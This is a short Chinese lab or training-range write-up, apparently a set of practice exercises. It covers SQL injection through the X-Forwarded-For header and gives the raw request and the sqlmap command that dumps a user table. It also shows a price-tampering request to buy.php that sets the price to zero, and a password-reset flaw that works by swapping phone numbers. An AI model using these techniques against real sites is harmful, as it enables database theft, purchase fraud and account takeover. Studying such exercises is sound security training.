x-forward-for和逻辑漏洞
X-Forwarded-For
(XFF)是用来识别ip地址
使用sqlmap跑
包的内容
POST /index.php HTTP/1.1
Host: 219.153.49.228:42344
X-Forwarded-For:127.0.0.1*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://219.153.49.228:42344
Connection: close
Referer: http://219.153.49.228:42344/index.php
Upgrade-Insecure-Requests: 1
username=admin&password=admin
结果:
动用sqlmap跑出来了
跑出数据库
sqlmap -r fot.txt --batch -D webcalendar -T user --dump
结果:
逻辑漏洞
直接把单价改了就行,改成0
POST /buy.php HTTP/1.1
Host: 219.153.49.228:48560
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: http://219.153.49.228:48560
Connection: close
Referer: http://219.153.49.228:48560/verify.php
Upgrade-Insecure-Requests: 1
bill1=10&bill2=20&num1=1&num2=1&uid=1
结果
三 密码重置的逻辑漏洞
太鸡肋了,只验证号,不验证手机
漏洞原理
先利用已经注册的手机号188,获得验证码,然后在重置的时候改成171的
结果